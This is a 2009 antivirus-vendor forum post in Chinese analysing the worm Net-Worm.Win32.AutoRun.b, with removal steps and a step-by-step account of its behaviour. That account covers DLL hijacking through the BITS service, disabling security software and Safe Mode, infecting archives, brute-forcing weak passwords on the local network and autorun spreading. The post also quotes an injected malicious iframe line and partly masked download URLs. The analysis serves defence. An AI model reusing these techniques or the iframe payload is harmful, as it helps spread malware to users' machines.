Board logo

标题: 网络蠕虫Net-Worm.Win32.AutoRun.b [打印本页]
作者: pioneer     时间: 2009-9-24 18:13    标题: 网络蠕虫Net-Worm.Win32.AutoRun.b

网络蠕虫

Net-Worm.Win32.AutoRun.b

捕获时间

2009-9-24

危害等级



病毒症状

 该样本是使用“VC”编写的蠕虫病毒,由微点主动防御软件自动捕获,采用“UPX”加壳方式,企图躲避特征码扫描,加壳后长度为“24,064 字节 ”,图标为“
”,病毒扩展名为“exe”,主要通过“文件捆绑”、“下载器下载”、“移动存储介质”、“网页挂马”等方式传播,病毒主要目的为实现网络病毒传播。
  用户中毒后,会出现杀毒软件无故退出、系统运行缓慢、网络速度降低、出现大量未知进程等现象。

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑、下载器下载

防范措施

已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知后门程序”,请直接选择删除处理(如图1);


图1 微点主动防御软件自动捕获未知病毒(未升级)




如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Net-Worm.Win32.AutoRun.b”,请直接选择删除(如图2)。



  图2   微点主动防御软件升级后截获已知病毒




未安装微点主动防御软件的手动解决办法:

1、手动恢复以下文件:

拷贝相同版本文件到: %SystemRoot%\system32\qmgr.dll
拷贝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts
手动或用工具清除所有压缩包中的病毒
手动或用工具恢复所有网页文件。

2、手动删除以下文件:
  
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X为所有盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}  (X为所有盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X为所有盘符)

3、手动删除以下注册表值:
键: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\[所有劫持]

4、手动恢复以下注册表值:

      键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS
      值: Start
      数据: 0x00000003

   修复安全模式:

键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

变量声明:

 %SystemDriver%       系统所在分区,通常为“C:\”
 %SystemRoot%        WINDODWS所在目录,通常为“C:\Windows”
 %Documents and Settings%  用户文档目录,通常为“C:\Documents and Settings”
 %Temp%           临时文件夹,通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
 %ProgramFiles%       系统程序默认安装目录,通常为:“C:\ProgramFiles”

[ Last edited by pioneer on 2009-9-25 at 09:11 ]
作者: pioneer     时间: 2009-9-24 18:17
病毒分析

(1)停止名为"BITS"的服务,去掉%SystemRoot%\system32\qmgr.dll文件保护属性,并释放动态链接
库%SystemRoot%\system32\qmgr.dll,替换掉正常的qmgr.dll,启动"BITS"服务,通过该服务加载病毒程序。
(2)检查%SystemRoot%\system32\qmgr.dll是否被360tray.exe检测,如果是,则创建一个名为"360SpShadow0"的设备,通过发送IO控
制码的方式控制该设备从而绕过360tray.exe的检测。
(3) 创建线程,获取当前进程快照,查找进程"avp.exe"、"bdagent.exe"、"360tray.exe"是否存在,如果找到,则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进
程空间,并将杀软进程主线程终止,使其进程退出,完成之后,删除%SystemRoot%\system32\1l1.dll。
(4)创建线程,删除注册表相关键值,使用户无法进入安全模式,创建名为"SvcMain"的服务,释放驱动%TEMP%\SvcMain.sys并加载,
通过该驱动程序恢复SSDT,完成之后,删除%TEMP%\SvcMain.sys,并删除服务对应的注册表键值。之后,删除大部分杀软的服务,
并作镜像劫持。
(5)创建线程,查找所有文件后缀名为htm、html、asp、aspx的网页文件,如果找到,往目标文件中插入代码<iframe
src=http://mm.uu8***7.cn/index/mm.htm width=100 height=0></iframe>,并开启一个新进程执行%ProgramFiles%\Internet
Explorer\iexplore.exe,通过iexplore.exe访问嵌入的恶意网址。
(6)创建线程,新建文件%TEMP%\TempLocal.txt,访问目标网址读取内容,将读取的内容写入TempLocal.txt,并访问TempLocal.txt文
件中保存的网址,下载新病毒到本地运行。
(7)查找并修改文件%SystemRoot%\System32\drivers\etc\hosts。
(8)释放文件%SystemRoot%\System32\dllcache\lsasvc.dll,并运行。
(9)创建线程,遍历所有盘符,查找所有rar压缩包文件,如果找到,通过调用%ProgramFiles%\WinRAR\Rar.exe程序将其解压,将 病毒程序复制到解压出的文件夹中,然后再压缩回去,完成将病毒添加到压缩包中的功能。
(10)创建线程,扫描局域网其它主机,并通过自带的弱口令列表尝试枚举其它主机的管理密码,如果枚举成功,从指定网址下载病毒程
序到本地执行,并复制到其它主机的所有共享文件夹中运行。
(11)创建线程,遍历当前所有盘符,在每个盘符下创建文件autorun.inf,并在每个盘符下创建文件夹recycle.{645FF040-5081-101B- 9F08-00AA002F954E},并将%SystemRoot%\System32\dllcache\lsasvc.dll重命名为Ghost.exe复制到
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,使用户一但双击磁盘或打开资源管理器自动运行病毒Ghost.exe
(12)创建线程,不断读取%TEMP%\TempLocal.txt文件中的网址,下载新病毒。
(13)创建线程,释放病毒程序%TEMP%\syshost.exe,并开启新进程执行该程序。
(14) 释放批处理文件%TEMP%\TempDel.bat,并运行,将病毒自身重命名复制到%SystemRoot%\system32\dllcache\lsasvc.dll,之后删除自身和TempDel.bat。

病毒创建文件:

%TEMP%\SvcMain.sys
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%TEMP%\TempDel.bat
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X为各个盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}  (X为各个盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X为各个盘符)

病毒修改文件:

%SystemRoot%\system32\qmgr.dll
%SystemRoot%\system32\drivers\etc\hosts

病毒删除文件:

%TEMP%\SvcMain.sys
%TEMP%\TempDel.bat

病毒创建进程:

iexplore.exe

病毒创建注册表:
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[映像劫持]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain

病毒修改注册表:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ BITS\Start

病毒删除注册表:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

病毒访问网络:
   
http://mm.uu***67.cn/index/mm.htm
http://www.d***04.com/msn/mm.txt
http://www.d***567.cn/down/qqmm.exe
http://www.d***567.cn/down/qqma.exe

[ Last edited by pioneer on 2009-9-25 at 09:08 ]



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn